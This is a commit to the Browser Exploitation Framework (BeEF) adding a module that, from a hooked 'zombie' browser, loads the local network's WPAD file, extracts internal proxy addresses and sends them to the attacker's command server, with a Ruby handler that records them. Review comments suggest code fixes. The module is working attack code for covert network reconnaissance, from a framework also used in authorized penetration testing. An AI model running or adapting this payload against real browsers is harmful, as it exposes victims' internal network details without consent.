
Add Get Proxy Servers (WPAD) module

1 parent 4c62d4a commit 6d2cf5efe2719d125bee219d82681eac4db61ab8 @bcoles bcoles committed Oct 11, 2015
@@ -0,0 +1,48 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ load_script = function(url) {
+ beef.debug("[Get Proxy Servers] Loading: " + url);
+ var s = document.createElement("script");
+ s.type = 'text/javascript';
+ s.src = url;
+ document.body.appendChild(s);
+ }
+
+ read_wpad = function() {
+ if (typeof FindProxyForURL === 'function') {
+ var wpad = FindProxyForURL.toString();
+ beef.debug("[Get Proxy Servers] Success: Found wpad (" + wpad.length + ' bytes)');
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=true&wpad="+wpad);
+ } else {
+ beef.debug("[Get Proxy Servers] Error: Did not find wpad");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=false");
+ return;
+ }
+ var proxies = [];
+ var proxyRe = /PROXY\s+[a-zA-Z0-9\.\-_]+:[0-9]{1,5}/g;
+ while (match = proxyRe.exec(wpad)) {
+ proxies.push(match[0]);
+ }
+ var proxyRe = /SOCKS\s+[a-zA-Z0-9\.\-_]+:[0-9]{1,5}/g;
+ while (match = proxyRe.exec(wpad)) {
+ proxies.push(match[0]);
+ }
+ if (proxies.length == 0) {
+ beef.debug("[Get Proxy Servers] Found no proxies");
+ return;
+ }
+ beef.debug("[Get Proxy Servers] Found "+proxies.length+" proxies: " + proxies.join(','));
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "proxies=" + proxies.join(','));
+ }
+
+ load_script("http://wpad/wpad.dat");
+ setTimeout("read_wpad()", 10000);
+
+});
+
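Review bot: `load_script`, `read_wpad` and `match` are assigned without `var`, so they become properties of the page's `window` instead of staying inside the `beef.execute` closure, and `proxyRe` is declared with `var` twice. `read_wpad` only needs to be global because the timer is given a string to evaluate; declaring `var read_wpad = function() {` and `var match;` and passing the function itself, `setTimeout(read_wpad, 10000);`, removes both the globals and the string evaluation. The raw `wpad` source is appended after `has_wpad=true&wpad=` unescaped and can itself contain `&` and `=`; whether that matters depends on how the receiving side splits the result, which this hunk does not show, but `encodeURIComponent(wpad)` would make it unambiguous.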
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_proxy_servers_wpad:
+ enable: true
+ category: "Network"
+ name: "Get Proxy Servers (WPAD)"
+ description: "This module retrieves proxy server addresses for the zombie browser's local network using Web Proxy Auto-Discovery Protocol (WPAD).<br/><br/>Note: The zombie browser must resolve <i>wpad</i> to an IP address successfully for this module to work."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_proxy_servers_wpad < BeEF::Core::Command
+
+ def post_execute
+ save({'result' => @datastore['result']})
+
+ configuration = BeEF::Core::Configuration.instance
+ return unless configuration.get("beef.extension.network.enable") == true
+ session_id = @datastore['beefhook']
+ if @datastore['results'] =~ /^proxies=(.+)$/
+ proxies = $1.to_s
+ proxies.split(',').uniq.each do |proxy|
+ if proxy =~ /^(SOCKS|PROXY)\s+([\d\.]+:[\d]{1,5})/
+ proxy_type = "#{$1}"
+ ip = $2.to_s.split(':')[0]
+ port = $2.to_s.split(':')[1]
+ proto = 'HTTP' if proxy_type =~ /PROXY/
+ proto = 'SOCKS' if proxy_type =~ /SOCKS/
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found #{proto} proxy [ip: #{ip}, port: #{port}]")
+ BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto.downcase, :ip => ip, :port => port, :type => "#{proto} Proxy")
+ end
+ end
+ end
+ end
+ end
+
+end
+
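Review bot: The value parsed in `post_execute` is supplied by the hooked browser and written to `NetworkService`, yet the patterns validating it are loose: `^`/`$` anchor per line in Ruby rather than to the whole string, and `[\d]{1,5}` has no end anchor or range check, so a six-digit port is silently truncated to five digits and ports above 65535 are accepted. Anchoring and capturing the port separately, `if proxy =~ /\A(SOCKS|PROXY)\s+([\d\.]+):(\d{1,5})\z/`, then `next unless (1..65535).cover?($3.to_i)`, keeps malformed entries out of the table (with `ip = $2` and `port = $3`). The method also saves `@datastore['result']` but parses `@datastore['results']`; one of the two keys looks like a typo, so the saved result may be nil, which is worth checking against the other command modules. Finally, this pattern accepts only dotted-numeric hosts while the JavaScript side also collects hostnames, so those are dropped without a log line; a comment such as `# hostnames are ignored: NetworkService stores IPs only` would make that intentional.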
